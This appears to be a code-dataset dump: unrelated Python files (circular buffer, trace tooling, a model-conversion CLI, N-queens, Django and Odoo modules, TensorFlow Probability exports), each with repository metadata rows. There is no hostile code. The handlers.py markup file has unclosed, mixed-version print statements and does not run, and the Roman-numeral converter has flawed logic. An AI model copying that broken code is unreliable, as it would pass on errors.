self.buffer = [None] * datasize
self.capacity = datasize
self.current = (0, 0)
def get_elem(self, index):
""" helper function to increment counters """
temp = self.current[0]
if index == 0:
self.current = ((self.current[0] + 1) % (self.capacity), self.current[1])
else:
temp = self.current[1]
self.current = (self.current[0], (self.current[1] + 1) % (self.capacity))
return temp
def read(self):
""" read function as part of CircularBuffer """
if len(self.buffer) < 1 or all(each is None for each in self.buffer):
raise BufferEmptyException("tried reading from empty buffer")
idx = self.get_elem(0)
data = self.buffer[idx]
self.buffer[idx] = None
return data
def write(self, data):
""" write function as part of CircularBuffer """
if self.current[0] == self.current[1] and self.buffer[self.current[0]]:
raise BufferFullException("cannot add {} to full buffer".format(data))
self.buffer[self.get_elem(1)] = data
def overwrite(self, data):
""" overwrite the oldest data first """
self.buffer[self.get_elem(0)] = data
def clear(self):
""" clear out the buffer """
self.buffer = [None] * self.capacity
| [
"[email protected]"
] | |
d6c6f07c20d59e2954fa76d05a86559f3dc82759 | a31c54cb9b27e315567ed865e07cb720fc1e5c8e | /revenge/techniques/native_timeless_tracer/timeless_trace_item.py | f94c99a65e749528e119e21889e9b5142e3c5bcd | [] | no_license | bannsec/revenge | 212bc15e09f7d864c837a1829b3dc96410e369d3 | 2073b8fad76ff2ba21a5114be54e959297aa0cf9 | refs/heads/master | 2021-06-25T12:26:02.609076 | 2020-05-29T15:46:45 | 2020-05-29T15:46:45 | 188,461,358 | 51 | 6 | null | null | null | null | UTF-8 | Python | false | false | 2,456 | py |
import logging
logger = logging.getLogger(__name__)
from ... import common
class NativeTimelessTraceItem(object):
def __init__(self, process, context=None, depth=None, previous=None):
"""Class describing a single step of NativeTimelessTracing
Args:
process (revenge.Process): Process object
context (dict): Dictionary describing this step's context
depth (int): Current call depth
previous (NativeTimelessTraceItem, optional): Previous timeless
trace item to use for differential generation
"""
self._process = process
self._previous = previous
self.context = context
self.depth = depth
def __repr__(self):
attrs = ["NativeTimelessTraceItem"]
attrs.append(str(self.context.pc.next.thing))
return "<{}>".format(' '.join(attrs))
@classmethod
@common.validate_argument_types(snapshot=dict)
def from_snapshot(klass, process, snapshot, previous=None):
"""Creates a NativeTimelessTraceItem from a snapshot returned by timeless_snapshot()
Args:
process (revenge.Process): Process object
snapshot (dict): Timeless snapshot dictionary
previous (NativeTimelessTraceItem, optional): Previous timeless
trace item to use for differential generation
"""
if "is_timeless_snapshot" not in snapshot or not snapshot["is_timeless_snapshot"]:
raise RevengeInvalidArgumentType("from_snapshot does not appear to be timeless_snapshot dictionary.")
context = snapshot["context"]
depth = snapshot["depth"]
return klass(process, context=context, depth=depth, previous=previous)
@property
def instruction(self):
"""Returns the assembly instruction object for this item."""
return self.context.pc.next.thing
@property
def context(self):
return self.__context
@context.setter
@common.validate_argument_types(context=(dict, type(None)))
def context(self, context):
diff = self._previous.context if self._previous is not None else None
# TODO: This is an assumption...
if isinstance(context, dict):
self.__context = CPUContext(self._process, diff=diff, **context)
elif context is None:
self.__context = None
from ...exceptions import *
from ...cpu import CPUContext
| [
"[email protected]"
] | |
fee4d2124eac9fad1e5d0bc58e3c6649164ab65c | e245035c7bff120d5f7a8a26412f14d11a77a46f | /huggingface_transformer_src/src/transformers/commands/convert.py | 2ca5a57ca36d0a5c150959f2f1b7daaec455c17a | [
"Apache-2.0"
] | permissive | fuxuelinwudi/R-Drop | 82f27e623f319065b75b9e2b7ebe285c2aa0582b | 88bba6386f2edf7aa45ae6795103dbf4be085e99 | refs/heads/main | 2023-06-06T14:28:55.773778 | 2021-06-27T05:39:27 | 2021-06-27T05:39:27 | 381,313,887 | 2 | 0 | MIT | 2021-06-29T09:43:58 | 2021-06-29T09:43:58 | null | UTF-8 | Python | false | false | 7,555 | py | # Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from argparse import ArgumentParser, Namespace
from ..utils import logging
from . import BaseTransformersCLICommand
def convert_command_factory(args: Namespace):
"""
Factory function used to convert a model TF 1.0 checkpoint in a PyTorch checkpoint.
Returns: ServeCommand
"""
return ConvertCommand(
args.model_type, args.tf_checkpoint, args.pytorch_dump_output, args.config, args.finetuning_task_name
)
IMPORT_ERROR_MESSAGE = """
transformers can only be used from the commandline to convert TensorFlow models in PyTorch, In that case, it requires
TensorFlow to be installed. Please see https://www.tensorflow.org/install/ for installation instructions.
"""
class ConvertCommand(BaseTransformersCLICommand):
@staticmethod
def register_subcommand(parser: ArgumentParser):
"""
Register this command to argparse so it's available for the transformer-cli
Args:
parser: Root parser to register command-specific arguments
"""
train_parser = parser.add_parser(
"convert",
help="CLI tool to run convert model from original "
"author checkpoints to Transformers PyTorch checkpoints.",
)
train_parser.add_argument("--model_type", type=str, required=True, help="Model's type.")
train_parser.add_argument(
"--tf_checkpoint", type=str, required=True, help="TensorFlow checkpoint path or folder."
)
train_parser.add_argument(
"--pytorch_dump_output", type=str, required=True, help="Path to the PyTorch saved model output."
)
train_parser.add_argument("--config", type=str, default="", help="Configuration file path or folder.")
train_parser.add_argument(
"--finetuning_task_name",
type=str,
default=None,
help="Optional fine-tuning task name if the TF model was a finetuned model.",
)
train_parser.set_defaults(func=convert_command_factory)
def __init__(
self,
model_type: str,
tf_checkpoint: str,
pytorch_dump_output: str,
config: str,
finetuning_task_name: str,
*args
):
self._logger = logging.get_logger("transformers-cli/converting")
self._logger.info(f"Loading model {model_type}")
self._model_type = model_type
self._tf_checkpoint = tf_checkpoint
self._pytorch_dump_output = pytorch_dump_output
self._config = config
self._finetuning_task_name = finetuning_task_name
def run(self):
if self._model_type == "albert":
try:
from ..models.albert.convert_albert_original_tf_checkpoint_to_pytorch import (
convert_tf_checkpoint_to_pytorch,
)
except ImportError:
raise ImportError(IMPORT_ERROR_MESSAGE)
convert_tf_checkpoint_to_pytorch(self._tf_checkpoint, self._config, self._pytorch_dump_output)
elif self._model_type == "bert":
try:
from ..models.bert.convert_bert_original_tf_checkpoint_to_pytorch import (
convert_tf_checkpoint_to_pytorch,
)
except ImportError:
raise ImportError(IMPORT_ERROR_MESSAGE)
convert_tf_checkpoint_to_pytorch(self._tf_checkpoint, self._config, self._pytorch_dump_output)
elif self._model_type == "funnel":
try:
from ..models.funnel.convert_funnel_original_tf_checkpoint_to_pytorch import (
convert_tf_checkpoint_to_pytorch,
)
except ImportError:
raise ImportError(IMPORT_ERROR_MESSAGE)
convert_tf_checkpoint_to_pytorch(self._tf_checkpoint, self._config, self._pytorch_dump_output)
elif self._model_type == "t5":
try:
from ..models.t5.convert_t5_original_tf_checkpoint_to_pytorch import convert_tf_checkpoint_to_pytorch
except ImportError:
raise ImportError(IMPORT_ERROR_MESSAGE)
convert_tf_checkpoint_to_pytorch(self._tf_checkpoint, self._config, self._pytorch_dump_output)
elif self._model_type == "gpt":
from ..models.openai.convert_openai_original_tf_checkpoint_to_pytorch import (
convert_openai_checkpoint_to_pytorch,
)
convert_openai_checkpoint_to_pytorch(self._tf_checkpoint, self._config, self._pytorch_dump_output)
elif self._model_type == "transfo_xl":
try:
from ..models.transfo_xl.convert_transfo_xl_original_tf_checkpoint_to_pytorch import (
convert_transfo_xl_checkpoint_to_pytorch,
)
except ImportError:
raise ImportError(IMPORT_ERROR_MESSAGE)
if "ckpt" in self._tf_checkpoint.lower():
TF_CHECKPOINT = self._tf_checkpoint
TF_DATASET_FILE = ""
else:
TF_DATASET_FILE = self._tf_checkpoint
TF_CHECKPOINT = ""
convert_transfo_xl_checkpoint_to_pytorch(
TF_CHECKPOINT, self._config, self._pytorch_dump_output, TF_DATASET_FILE
)
elif self._model_type == "gpt2":
try:
from ..models.gpt2.convert_gpt2_original_tf_checkpoint_to_pytorch import (
convert_gpt2_checkpoint_to_pytorch,
)
except ImportError:
raise ImportError(IMPORT_ERROR_MESSAGE)
convert_gpt2_checkpoint_to_pytorch(self._tf_checkpoint, self._config, self._pytorch_dump_output)
elif self._model_type == "xlnet":
try:
from ..models.xlnet.convert_xlnet_original_tf_checkpoint_to_pytorch import (
convert_xlnet_checkpoint_to_pytorch,
)
except ImportError:
raise ImportError(IMPORT_ERROR_MESSAGE)
convert_xlnet_checkpoint_to_pytorch(
self._tf_checkpoint, self._config, self._pytorch_dump_output, self._finetuning_task_name
)
elif self._model_type == "xlm":
from ..models.xlm.convert_xlm_original_pytorch_checkpoint_to_pytorch import (
convert_xlm_checkpoint_to_pytorch,
)
convert_xlm_checkpoint_to_pytorch(self._tf_checkpoint, self._pytorch_dump_output)
elif self._model_type == "lxmert":
from ..models.lxmert.convert_lxmert_original_pytorch_checkpoint_to_pytorch import (
convert_lxmert_checkpoint_to_pytorch,
)
convert_lxmert_checkpoint_to_pytorch(self._tf_checkpoint, self._pytorch_dump_output)
else:
raise ValueError(
"--model_type should be selected in the list [bert, gpt, gpt2, t5, transfo_xl, xlnet, xlm, lxmert]"
)
| [
"[email protected]"
] | |
aa5c4a98512495974fb7608726a4f591fddd94e6 | 8e39a4f4ae1e8e88d3b2d731059689ad5b201a56 | /dev-util/itstool/itstool-2.0.2.py | 98413b632277dc442d4cbfa589f28591e237e38c | [] | no_license | wdysln/new | d5f5193f81a1827769085932ab7327bb10ef648e | b643824b26148e71859a1afe4518fe05a79d333c | refs/heads/master | 2020-05-31T00:12:05.114056 | 2016-01-04T11:38:40 | 2016-01-04T11:38:40 | 37,287,357 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | metadata = """
summary @ XML to PO and back again
homepage @ http://itstool.org/
license @ GPL3
src_url @ http://files.itstool.org/$name/$fullname.tar.bz2
arch @ ~x86_64
"""
depends = """
build @ dev-libs/libxml2
"""
| [
"[email protected]"
] | |
9bb91005f84d4d67416db899318bf4ddb657920e | 463febc26f9f6e09d51206c87c7450476b1dfa7c | /0x0C-nqueens/0-nqueens.py | b48a68afd83f68b7c5b517b2fcb380f754708017 | [] | no_license | Nahi-Terefe/holbertonschool-interview | 77a5fd0e668cabaa2f986ded265996061fcbc9f8 | e4842430f346d5b18e407ac468ba225aaeaae9d8 | refs/heads/master | 2023-02-17T13:31:31.389980 | 2021-01-12T00:24:42 | 2021-01-12T00:24:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,734 | py | #!/usr/bin/python3
""" Solving n queens """
import sys
# error handling for argv[1]
if __name__ == "__main__":
if len(sys.argv) == 1 or len(sys.argv) > 2:
print("Usage: nqueens N")
sys.exit(1)
N = sys.argv[1]
try:
N_int = int(N)
except ValueError:
print("N must be a number")
sys.exit(1)
if N_int < 4:
print("N must be at least 4")
sys.exit(1)
# n queens methods
coords = []
def isSafe(coords, row, col):
""" Checks if queen can be placed in coord of board.
Returns True if can, else False
"""
rows = []
cols = []
diag_r = []
diag_l = []
for square in coords:
rows.append(square[0])
cols.append(square[1])
diag_r.append(square[0] + square[1])
diag_l.append(square[1] - square[0])
if row in rows or col in cols:
return False
if row + col in diag_r or col - row in diag_l:
return False
return True
def solveNqueens(coords, col, safe_queens=[]):
""" Creates array of queen positions
Returns array
"""
for x in range(N_int):
if isSafe(coords, x, col):
coords.append([x, col])
if col == N_int - 1:
safe_queens.append(coords.copy())
del coords[-1]
else:
solveNqueens(coords, col + 1)
if len(coords):
del coords[-1]
return safe_queens
# sets base case for recursion
coords = solveNqueens(coords, 0)
# prints coords of squares for safe queens
for squares in coords:
print(squares)
| [
"[email protected]"
] | |
c99cf3261ef3264d9556a7b23a4752ba3d1719ea | 95c9cfb57346a4ff45b05847c2fd740cdd60fb79 | /examples/2-hydrotrend/run_hydrotrend.py | fcff63ddf946fbbaae6da021a5b914505fc530ec | [
"MIT"
] | permissive | mdpiper/dakota-tutorial | 1234812eaf00e97999abcdccc0a3027ed2bb1d92 | de5177bc741a0475266011de8363ff1ad4ce5ff0 | refs/heads/master | 2021-01-17T22:07:44.576114 | 2015-05-25T18:54:24 | 2015-05-25T18:54:24 | 35,640,799 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,479 | py | #! /usr/bin/env python
# Brokers communication between HydroTrend and Dakota through files.
# Mark Piper ([email protected])
import sys
import os
import re
import shutil
from subprocess import call
import numpy as np
def read(output_file):
"""Reads a column of text containing HydroTrend output."""
return np.loadtxt(output_file, skiprows=2)
def write(results_file, array, labels):
"""Writes a Dakota results file from an input array."""
with open(results_file, 'w') as fp:
for i in range(len(array)):
fp.write(str(array[i]) + '\t' + labels[i] + '\n')
def get_labels(params_file):
"""Extracts labels from a Dakota parameters file."""
labels = []
with open(params_file, 'r') as fp:
for line in fp:
if re.search('ASV_', line):
labels.append(''.join(re.findall(':(\S+)', line)))
return labels
def main():
# Files and directories.
start_dir = os.path.dirname(os.path.realpath(__file__))
input_dir = os.path.join(start_dir, 'HYDRO_IN')
if os.path.exists(input_dir) is False:
os.mkdir(input_dir)
output_dir = os.path.join(start_dir, 'HYDRO_OUTPUT')
if os.path.exists(output_dir) is False:
os.mkdir(output_dir)
input_template = 'HYDRO.IN.template'
input_file = 'HYDRO.IN'
hypsometry_file = 'HYDRO0.HYPS'
output_file = 'HYDROASCII.QS'
# Use the parsing utility `dprepro` (from $DAKOTA_DIR/bin) to
# incorporate the parameters from Dakota into the HydroTrend input
# template, creating a new HydroTrend input file.
shutil.copy(os.path.join(start_dir, input_template), os.curdir)
call(['dprepro', sys.argv[1], input_template, input_file])
shutil.copy(input_file, input_dir)
shutil.copy(os.path.join(start_dir, hypsometry_file), input_dir)
# Call HydroTrend, using the updated input file.
call(['hydrotrend',
'--in-dir', os.path.relpath(input_dir),
'--out-dir', os.path.relpath(output_dir)])
# Calculate mean and standard deviation of a HydroTrend output time
# series for the simulation. Write the output to a Dakota results file.
shutil.copy(os.path.join(output_dir, output_file), os.curdir)
labels = get_labels(sys.argv[1])
series = read(output_file)
if series is not None:
m_series = [np.mean(series), np.std(series)]
else:
m_series = [0, 0]
write(sys.argv[2], m_series, labels)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
2afb87b876777eba3345babac92efef1ee1fa736 | 0d0afd1dce972b4748ce8faccd992c019794ad9e | /integra/exata_personalizacao/wizard/projeto_relatorio.py | 4618ff3fdae885ab494f0eb9f31e24029bb9adc2 | [] | no_license | danimaribeiro/odoo-erp | e2ca2cfe3629fbedf413e85f7c3c0453fd16941e | d12577bf7f5266b571cbedeb930720d653320e96 | refs/heads/master | 2020-01-23T21:32:16.149716 | 2016-11-05T15:35:40 | 2016-11-05T15:35:40 | 67,892,809 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,555 | py | # -*- encoding: utf-8 -*-
import os
from osv import orm, fields, osv
import base64
from finan.wizard.finan_relatorio import Report
from pybrasil.data import parse_datetime, mes_passado, primeiro_dia_mes, ultimo_dia_mes, hoje, agora, formata_data
from finan.wizard.relatorio import *
from datetime import date
import csv
from pybrasil.base import DicionarioBrasil
from pybrasil.valor.decimal import Decimal as D
from pybrasil.valor import formata_valor
from pybrasil.data.grafico_gantt import tempo_tarefa
from dateutil.relativedelta import relativedelta
DIR_ATUAL = os.path.abspath(os.path.dirname(__file__))
JASPER_BASE_DIR = os.path.join(DIR_ATUAL, '../../reports/base/')
class projeto_relatorio(osv.osv_memory):
_name = 'projeto.relatorio'
_inherit = 'projeto.relatorio'
def gera_relatorio_imovel_projeto(self, cr, uid, ids, context={}):
if not ids:
return False
id = ids[0]
rel_obj = self.browse(cr, uid, id, context=context)
rel = Report('Imoveis por Projeto', cr, uid)
rel.caminho_arquivo_jasper = os.path.join(JASPER_BASE_DIR, 'exata_relatorio_venda_projeto.jrxml')
rel.outputFormat = rel_obj.formato
rel.parametros['PROJETO_ID'] = rel_obj.project_id.id
pdf, formato = rel.execute()
dados = {
'nome': u'Imoveis_' + rel_obj.project_id.name + '.' + rel_obj.formato,
'arquivo': base64.encodestring(pdf)
}
rel_obj.write(dados)
return True
projeto_relatorio()
| [
"[email protected]"
] | |
305da2da6f4b22e89e4160f93e3e470090d20926 | d78dfc5089717fc242bbd7097f507d811abb4260 | /USA/script.icechannel.Usefile.settings/default.py | bdf16309ca6cef9b0506ee0fee1844dc07dd00bb | [] | no_license | tustxk/AddOnRepo | 995b980a9ec737e2c25bed423fc83f710c697e40 | 6b86a06cb37e6e10b4119584dd7311ebc2318e54 | refs/heads/master | 2022-10-08T21:34:34.632346 | 2016-10-28T09:48:01 | 2016-10-28T09:48:01 | 70,684,775 | 1 | 1 | null | 2022-10-01T16:27:13 | 2016-10-12T09:31:16 | Python | UTF-8 | Python | false | false | 163 | py | addon_id="script.icechannel.Usefile.settings"
addon_name="iStream - Usefile - Settings"
import xbmcaddon
addon = xbmcaddon.Addon(id=addon_id)
addon.openSettings()
| [
"[email protected]"
] | |
31d493116b2e621b5d93a3977480ec7ae3fd48cf | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2157/60749/252819.py | e40d7365ee8419681863874c71cda7f98525182e | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 510 | py | str1=input()
def RomaToNum(str1):
dic={'I':1, 'V':5, 'X':10, 'L':50,'C':100,'D':500,'M':1000}
res=[]
for h in str1:
res.append(dic[h])
max1=0
for t in res:
max1=max(t,max1)
max_index=res.index(max1)
result=0
for h in range(0,max_index):
result-=res[h]
for h in range(max_index, len(res)-1):
if res[h]>=res[h+1]:
result+=res[h]
else:
result-=res[h]
result+=res[-1]
return result
print(RomaToNum(str1)) | [
"[email protected]"
] | |
87ffa029204a02b6b24eb241d0b349c255608b57 | ccfc8b4b6b7a48e387c3ecd56ca110eb9f174367 | /python/work/5.0-stable/project/videoclient/api/persons/photos/urls.py | 75d2aa555f21b805075d975db736c3fe7ef27c5c | [] | no_license | denis-pinaev/tmp_trash | c4d6c4a4cefaacc8af5e93d1175f0a56e3d8e656 | 7642c0ef0cc45b978e579023406abfbbb656896d | refs/heads/master | 2016-08-11T12:03:43.376455 | 2016-03-04T12:53:35 | 2016-03-04T12:53:35 | 52,145,331 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | from django.conf.urls.defaults import patterns, include, url
import views
urlpatterns = patterns('',
url(r'^list/*$', views.list, {}, 'api_list_photos'),
url(r'^left/*$', views.left, {}, 'api_left_photos'),
) | [
"[email protected]"
] | |
42ea6542998ab172e883faf783222a5f90e1c0ad | ebcb092d796366d36a1afe9c381cd9e4c31026f1 | /python_markup/handlers.py | b4d1acfc276ad3b816d1d590b2c12416311792c6 | [
"MIT"
] | permissive | MiracleWong/PythonBasic | d2e0e56c88781ebf9c6870f185ceaba6ffaa21ca | cb8ec59dc646842b41966ea4ea4b1ee66a342eee | refs/heads/master | 2021-06-06T22:26:08.780210 | 2020-01-08T14:48:54 | 2020-01-08T14:48:54 | 96,536,299 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,976 | py | #!/usr/local/bin/python
# -*- coding: utf-8 -*-
# filename: handlers.py
# 为文本块打上合适的 HTML 标记
class Handler:
"""
处理程序父类
"""
def callback(self, prefix, name, *args):
method = getattr(self, prefix + name, None)
if callable(method): return method(*args)
def start(self, name):
self.callback('start_', name)
def end(self, name):
self.callback('end_', name)
def sub(self, name):
def substitution(match):
result = self.callback('sub_', name, match)
if result is None: result = match.group(0)
return result
return substitution
class HTMLRenderer(Handler):
"""
HTML 处理程序,给文本块加相应的 HTML 标记
"""
def start_document(self):
print('<html><head><title>ShiYanLou</title></head><body>')
def end_document(self):
print('</body></html>'
def start_paragraph(self):
print('<p style="color: #444;">'
def end_paragraph(self):
print('</p>'
def start_heading(self):
print('<h2 style="color: #68BE5D;">'
def end_heading(self):
print('</h2>'
def start_list(self):
print('<ul style="color: #363736;">'
def end_list(self):
print('</ul>'
def start_listitem(self):
print '<li>'
def end_listitem(self):
print('</li>')
def start_title(self):
print('<h1 style="color: #1ABC9C;">')
def end_title(self):
print('</h1>')
def sub_emphasis(self, match):
return '<em>%s</em>' % match.group(1)
def sub_url(self, match):
return '<a target="_blank" style="text-decoration: none;color: #BC1A4B;" href="%s">%s</a>' % (match.group(1), match.group(1))
def sub_mail(self, match):
return '<a style="text-decoration: none;color: #BC1A4B;" href="mailto:%s">%s</a>' % (match.group(1), match.group(1))
def feed(self, data):
print(data) | [
"[email protected]"
] | |
6344174edb82b52826ffe9156911e57162cf52b4 | c251223c9829a51fac8ae4d651dba0068da68f43 | /language_converter/main.py | 9d08979ae219e1e14aa3fa15aab2a9150fa319d7 | [] | no_license | Ajax12345/Web-Apps | b1c10e73f2c403cc900a0eddccb1d95b5f71e8aa | 105dfef93aa975cb95fa0216095939d33c2eb19a | refs/heads/master | 2021-01-23T17:34:05.962959 | 2017-09-18T23:44:37 | 2017-09-18T23:44:37 | 102,767,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | from bottle import Bottle, template, request
app = Bottle()
users = [{"ajax1234":"zorro"}]
username = None
password = None
@app.route('/')
def index():
data = {"to_display":"HI, how are you"}
return template("simple.html", to_display = "HI, how are you?")
@app.route('/run_code', method = "POST")
def get_code():
full_code = request.forms.get('code')
print full_code
if __name__ == '__main__':
app.run()
| [
"[email protected]"
] | |
11372e1174c14bf0f2fcd7bcb02fba3c76370519 | 8ce87aa7b8230a3fd474501c35e23c564f2780d0 | /organizacion/migrations/0003_auto_20150725_0630.py | f233fa0171a7b7febfa5efddf0ad37f6e59aded2 | [] | no_license | ErickMurillo/canicacao | 46e7a485257ab95902fb427d4cb0b5e72fd14ab5 | d4a79260c87d1ae1cdd8ecb8bc4be82e9ddb0cc7 | refs/heads/master | 2020-12-29T02:24:36.519281 | 2018-03-16T15:38:26 | 2018-03-16T15:38:26 | 35,285,596 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 781 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('organizacion', '0002_auto_20150723_2221'),
]
operations = [
migrations.AddField(
model_name='comercializacion_org',
name='fecha',
field=models.IntegerField(default=1, verbose_name=b'A\xc3\xb1o de recolecci\xc3\xb3n de informaci\xc3\xb3n'),
preserve_default=False,
),
migrations.AlterField(
model_name='organizacion',
name='gerente',
field=models.CharField(max_length=200, null=True, verbose_name=b'Representante legal', blank=True),
preserve_default=True,
),
]
| [
"[email protected]"
] | |
b8a5ebd8681495fd6c38f0e14d85a0f3171860dd | dd80a584130ef1a0333429ba76c1cee0eb40df73 | /external/chromium_org/printing/DEPS | bc43b418c77aafd04e87cead8cd587db70d587dc | [
"MIT",
"BSD-3-Clause"
] | permissive | karunmatharu/Android-4.4-Pay-by-Data | 466f4e169ede13c5835424c78e8c30ce58f885c1 | fcb778e92d4aad525ef7a995660580f948d40bc9 | refs/heads/master | 2021-03-24T13:33:01.721868 | 2017-02-18T17:48:49 | 2017-02-18T17:48:49 | 81,847,777 | 0 | 2 | MIT | 2020-03-09T00:02:12 | 2017-02-13T16:47:00 | null | UTF-8 | Python | false | false | 262 | include_rules = [
"+jni",
"+skia/ext",
"+third_party/icu/source/common/unicode",
"+third_party/icu/source/i18n/unicode",
"+third_party/skia",
"+ui/aura",
"+ui/base/resource",
"+ui/base/text",
"+ui/gfx",
"+ui/shell_dialogs",
"+win8/util",
]
| [
"[email protected]"
] | ||
0d8a223b3f1590a1b1e4491f34cf5321e061913b | 07eb17b45ce5414282a2464c69f50197968c312d | /stusched/app/urls.py | ffdfa5ca2f2ce34e32c9ac872ee1c74578091181 | [] | no_license | cmontemuino/dbschools | e15d4d03a3d2f0e1ee1fa47b8ce9748b7f09cdbc | d3ee1fdc5c36274e5d5f7834ca1110b941d097b9 | refs/heads/master | 2021-01-16T21:16:56.427183 | 2015-08-02T17:09:43 | 2015-08-02T17:09:43 | 6,158,940 | 0 | 0 | null | 2015-10-15T12:45:34 | 2012-10-10T14:49:16 | HTML | UTF-8 | Python | false | false | 783 | py | """stusched URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^status$', views.status, name='status'),
]
| [
"[email protected]"
] | |
584809ed53ad5619053d2185651806cf8714ed04 | 2195bec4cc44f5eb552f46fe62135d9f22e6dc03 | /apps/trade/migrations/0008_auto_20190122_1826.py | 25d6418999665e72e1ecc7a24ee97f90647b4dac | [] | no_license | DzrJob/gulishop | 5c802d1bba0ad6ec23aa4c29a8ac6abcc085497b | 5620f09cd6d2a99e7643d5ec0b6bc9e1203be6fe | refs/heads/master | 2020-04-16T17:58:17.404170 | 2019-02-07T07:17:59 | 2019-02-07T07:17:59 | 165,797,566 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 862 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2019-01-22 18:26
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('trade', '0007_auto_20190122_1812'),
]
operations = [
migrations.AlterField(
model_name='orderinfo',
name='address',
field=models.CharField(max_length=200, verbose_name='收货地址'),
),
migrations.AlterField(
model_name='orderinfo',
name='signer_mobile',
field=models.CharField(max_length=11, verbose_name='联系电话'),
),
migrations.AlterField(
model_name='orderinfo',
name='signer_name',
field=models.CharField(max_length=30, verbose_name='签收人'),
),
]
| [
"[email protected]"
] | |
c7c6abe6ddd69173a76601375d5aa36b3acc06e4 | 0627cc5c3adb47fd4e780b31a76d17839ad384ec | /tensorflow_probability/python/layers/__init__.py | 55a5079eaf94190c21b271793559f7ec7f4b90b3 | [
"Apache-2.0"
] | permissive | ml-lab/probability | 7e57377ae15bcbb9a7878e23d53f4505823b9117 | 09c1e495c929f5bc461a4edbc7710ab81b5b4933 | refs/heads/master | 2021-09-09T04:40:10.045594 | 2018-03-13T23:26:59 | 2018-03-13T23:27:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,304 | py | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""TensorFlow Probability layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow_probability.python.layers.conv_variational import convolution1d_flipout
from tensorflow_probability.python.layers.conv_variational import convolution1d_reparameterization
from tensorflow_probability.python.layers.conv_variational import Convolution1DFlipout
from tensorflow_probability.python.layers.conv_variational import Convolution1DReparameterization
from tensorflow_probability.python.layers.conv_variational import convolution2d_flipout
from tensorflow_probability.python.layers.conv_variational import convolution2d_reparameterization
from tensorflow_probability.python.layers.conv_variational import Convolution2DFlipout
from tensorflow_probability.python.layers.conv_variational import Convolution2DReparameterization
from tensorflow_probability.python.layers.conv_variational import convolution3d_flipout
from tensorflow_probability.python.layers.conv_variational import convolution3d_reparameterization
from tensorflow_probability.python.layers.conv_variational import Convolution3DFlipout
from tensorflow_probability.python.layers.conv_variational import Convolution3DReparameterization
from tensorflow_probability.python.layers.dense_variational import dense_flipout
from tensorflow_probability.python.layers.dense_variational import dense_local_reparameterization
from tensorflow_probability.python.layers.dense_variational import dense_reparameterization
from tensorflow_probability.python.layers.dense_variational import DenseFlipout
from tensorflow_probability.python.layers.dense_variational import DenseLocalReparameterization
from tensorflow_probability.python.layers.dense_variational import DenseReparameterization
from tensorflow_probability.python.layers.util import default_loc_scale_fn
from tensorflow_probability.python.layers.util import default_mean_field_normal_fn
__all__ = [
'Convolution1DFlipout',
'Convolution1DReparameterization',
'Convolution2DFlipout',
'Convolution2DReparameterization',
'Convolution3DFlipout',
'Convolution3DReparameterization',
'DenseFlipout',
'DenseLocalReparameterization',
'DenseReparameterization',
'convolution1d_flipout',
'convolution1d_reparameterization',
'convolution2d_flipout',
'convolution2d_reparameterization',
'convolution3d_flipout',
'convolution3d_reparameterization',
'default_loc_scale_fn',
'default_mean_field_normal_fn',
'dense_flipout',
'dense_local_reparameterization',
'dense_reparameterization',
]
| [
"[email protected]"
] | |
